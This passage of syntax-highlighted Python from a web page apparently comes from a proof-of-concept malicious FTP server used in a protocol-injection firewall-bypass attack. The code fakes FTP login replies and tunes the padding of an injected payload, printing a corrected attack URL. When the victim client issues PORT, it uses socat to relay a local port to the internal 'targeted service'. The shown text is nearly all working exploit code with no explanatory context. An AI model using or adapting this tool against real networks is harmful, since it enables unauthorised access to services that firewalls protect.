class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">upper<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;USER&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;331 Papers pleasern&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">upper<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;PASS&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;250 OKrn&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">upper<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;CWD&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;nP&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ERROR: not enough padding to isolate correct padding lengthn&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;n&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Correct padding!n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;250 Directory changedrn&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Payload size appears to be: %dn&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">new_url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">generateURL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">NL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># 8 for &#8220;CWD leet&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Try this URL instead:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">new_url<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">upper<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;PORT&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">next_command<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;rn&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">octets<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">decode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;utf-8&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;,&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;.&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">octets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">octets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">256<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">octets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Client has opened %s:%dn&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;200 PORT command successful.rn&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">local_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">random<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">randint<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">31337<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">41337<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">relay_cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;socat&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;tcp4-connect:%s:%d&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;tcp4-listen:%d,bind=127.0.0.1&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">local_port<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Setting up relay on 127.0.0.1:%d; connect to this to access the targeted service&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">local_port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">child<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">subprocess<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">call<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">relay_cmd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stdin<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">subprocess<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">DEVNULL<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">subprocess<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">STDOUT<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Relay finished.&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">upper<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;TYPE&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;250 Switching to Binary mode.rn&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">upper<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;EPSV&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;500 Command not understood.rn&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">upper<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;PASV&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;500 Command not understood.rn&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">upper<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;EPRT&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sendall<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-s\">&#8216;200 EPRT command successful.rn&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Unknown command:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Closing control channel.&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-114\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-115\"><span class=\"crayon-e\">print<\/span><span 